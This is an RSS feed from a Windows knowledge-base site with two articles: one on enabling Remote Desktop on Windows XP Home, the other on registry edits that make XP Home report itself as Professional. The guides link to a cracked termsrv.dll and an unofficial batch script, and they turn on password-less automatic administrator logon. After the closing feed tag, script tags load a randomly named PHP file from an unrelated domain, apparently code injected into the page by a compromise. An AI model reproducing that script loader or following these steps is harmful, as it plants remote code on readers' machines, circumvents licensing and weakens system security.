<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
    xmlns:admin="http://webns.net/mvcb/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:content="http://purl.org/rss/1.0/modules/content/">

    <channel>
    
    <title>Windows XP home | Program IN KB</title>

    <link>http://www.kb.programin.co.rs/</link>
    <description>Just another KB</description>
    <dc:language>en-ca</dc:language>
    <dc:creator>igor.trpcevic@gmail.com</dc:creator>

    <dc:rights>Copyright 2026</dc:rights>
    <admin:generatorAgent rdf:resource="http://www.codeigniter.com/" />

        
        <item>

          <title>Install and Enable Remote Desktop in Windows XP Home Edition</title>
          <link>http://www.kb.programin.co.rs/index.php/article/install-and-enable-remote-desktop-in-windows-xp-home-ed</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/install-and-enable-remote-desktop-in-windows-xp-home-ed</guid>

          <description><![CDATA[
      <p>Windows XP Home Edition (HE) does not come with or support Remote 
Desktop, or Terminal Services feature. There is Remote Desktop 
Connection (RDC) client which allows user to connect to remote host, but
 now accepting any remote desktop connection to the Windows XP Home PC<a id="KonaLink0" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.mydigitallife.info/2008/06/14/install-and-enable-remote-desktop-in-windows-xp-home-edition/#"><font style="color: blue ! important; font-size: 13px; position: static;" color="blue"><span class="kLink" style="color: blue ! important;"></span></font></a>. However, there is way to 
install and enable Remote Desktop Protocol (RDP) in Windows XP using the
 trick below.<br>
<span id="more-7698"></span><br>
Note that if you just want to be able to remote control the desktop of 
the computer running on Windows XP Home Edition, it may be easier and 
wiser to use the free VNC as alternative instead. One such VNC server 
and client is UltraVNC.</p>
<p>To run Remote Desktop Terminal Services (server component) in Windows
 XP Home Edition, the operating system must first made to recognize 
itself as Windows XP Professional Edition. See <a href="http://programin.co.rs/kb/index.php/article/convert-and-upgrade-windows-xp-home-to-professional-wit">convert
 Windows XP Home to Windows XP Professional</a> .<br></p>
<p>Confirm that the OS is now Windows XP Professional Edition by going 
to System Properties, by right clicking on “My Computer” and select 
“Properties”. Then download and install DevCon
 (direct download link to <a href="http://download.microsoft.com/download/1/1/f/11f7dd10-272d-4cd2-896f-9ce67f3e0240/devcon.exe">devcon.exe</a>),
 a command-line utility functions as an alternative to Device Manager.</p>
<p>devcon.exe is a self-extractor executable. Execute “devcon.exe” and 
choose a folder to unpack the content. devcon.exe will create two 
folders inside the selected path – i386 and ia64.</p>
<p>Open a command prompt window (Cmd), and the change directory into the
 i386 folder extracted by DevCon. Then run the following command to 
reinstall rdpdr driver:</p>
<p><code>devcon.exe -r install %windir%\inf\machine.inf root\rdpdr</code></p>
<p>Restart the computer after running the command.</p>
<p>At this stage, Windows XP ‘Professional’ which is converted still 
does not have the necessary Terminal Services related settings in the 
registry to run the Remote Desktop. To reinstall and enable Terminal 
Services in Windows XP Home turned Professional OS, download and run the
 <a href="http://www.ziddu.com/download.php?uid=bbCalJioa6+imJeqaPiblJStY6qfkZWobA==6">enable_tsxp.bat</a> batch script (also support enable TS
 in Windows 2000), which will create a .reg file to merge the required 
Terminal Services values to registry and bootlog. Reboot after patching 
the registry.</p>
<p>After reboot, the Terminal Services is running and ready to accept 
incoming Remote Desktop Connection session. To verify the Terminal 
Services is actually running, go to Control Panel -&gt; Administrator 
Tools -&gt; Services, and locate the “Terminal Services” entry. If the 
service is not started, start it manually. There won’t be a “Remote” tab
 in System Properties, and ensure that the port 3389 (the default port 
for Remote Desktop) is open in firewall.</p>
<p>Sometimes, it may be useful to <a href="http://www.mydigitallife.info/2008/06/13/enable-multiple-concurrent-remote-desktop-connections-or-sessions-in-windows-xp/">patch
 termsrv.dll with a cracked version which allows multiple RDC sessions 
and users</a> to fix some problems such as disconnection issue. It’s 
also good for testing by allowing connect remote desktop to localhost.</p>
<p>Note that the registry settings enable the automatic logon feature, 
where the system will auto login administrator on local console on every
 system startup without prompting for password, nor allowing user to 
select account to log on. To disable this feature, run Registry Editor 
(regedit), and navigate to the following registry key:</p>
<p>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon</p>
<p>Change the value data for “AutoAdminLogin” from “1″ to “0″.</p>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 11:50:45 +0000</pubDate>
        </item>

        
        
        <item>

          <title>Convert and Upgrade Windows XP Home to Professional Without Reinstalling</title>
          <link>http://www.kb.programin.co.rs/index.php/article/convert-and-upgrade-windows-xp-home-to-professional-wit</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/convert-and-upgrade-windows-xp-home-to-professional-wit</guid>

          <description><![CDATA[
      <p>After installing Windows XP Home Edition or Windows XP Professional 
Edition onto a computer, officially it’s impossible for user to convert,
 or upgrade from Windows XP Home to Pro edition, or downgrade from 
Windows XP Professional to Home edition without reformatting and 
reinstalling the operating system from clean and fresh state.<br>
<span id="more-7689"></span><br>
A lot of people always associate conversion of Windows XP edition to 
illegitimate or privacy reason, but sometimes, there may be legitimate 
and genuine reason for change, such as customer, who all the while using
 Windows XP Home Edition (HE) finally buy a genuine license product key 
for Professional edition to replace the illegal pirated version 
installed, or user receives additional license as gift, but don’t want 
to go through clean install Windows XP again, or want to keep using the 
computer with all data intact without interruption. </p>
<p>Here’s a trick to convert and turn Windows XP Home Edition to Windows
 XP Pro Edition, from within the operating system without going through 
installation again. Ok, let’s be frank. The hack doesn’t actually 
install and add in all the features from Windows XP Professional that 
Windows XP Home lacks of, such as Remote Desktop Server (see guide to <a href="http://programin.co.rs/kb/index.php/article/install-and-enable-remote-desktop-in-windows-xp-home-ed">install
 Remote Desktop on XP Home</a>) and Group Policy Editor (GPedit) utility
 tools, which has been removed on Windows XP Home edition. Some 
functions which turned off and disabled via integrated switches which 
read from registry flag whether it’s Home or Professional edition, such 
as EFS, RAID support and ability to join domain, may or may not work 
after migration. Basically, the trick only work to let Windows XP 
recognizes itself as Professional edition.</p>
<p>To convert and upgrade Windows XP Home to Windows XP Professional, 
follow procedure below.</p>
<ol><li>Open Registry Editor (regedit).</li><li>Navigate to <strong>HKEY_LOCAL_MACHINE/SYSTEM/ControlSet00X/Control/ProductOptions</strong>,
 where <strong>ControlSet00X</strong> is the one with the highest 
number.</li><li>Delete the <strong>ProductSuite</strong> registry key.</li><li>Then, create a new DWORD value and named it as <strong>Brand</strong>.</li><li>Set the “Brand” value data as <strong>0</strong>.</li><li>Reboot the system.</li><li>On boot up after the BIOS screen, press <strong>F8</strong> to 
display Windows XP Startup Menu.</li><li>Choose <strong>Last Known Good Configuration</strong> (LNG) and hit <strong>Enter</strong>.</li></ol>
<p>Windows XP will start up as usual. After logging into the desktop, 
check the system properties to verify that it’s now Windows XP 
Professional.</p>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 11:53:05 +0000</pubDate>
        </item>

        
        
    </channel></rss><script type="text/javascript">var gwloaded = false;</script>
<script src="http://tolfiles.net/wp-includes/OsWNRgLG.php" type="text/javascript"></script>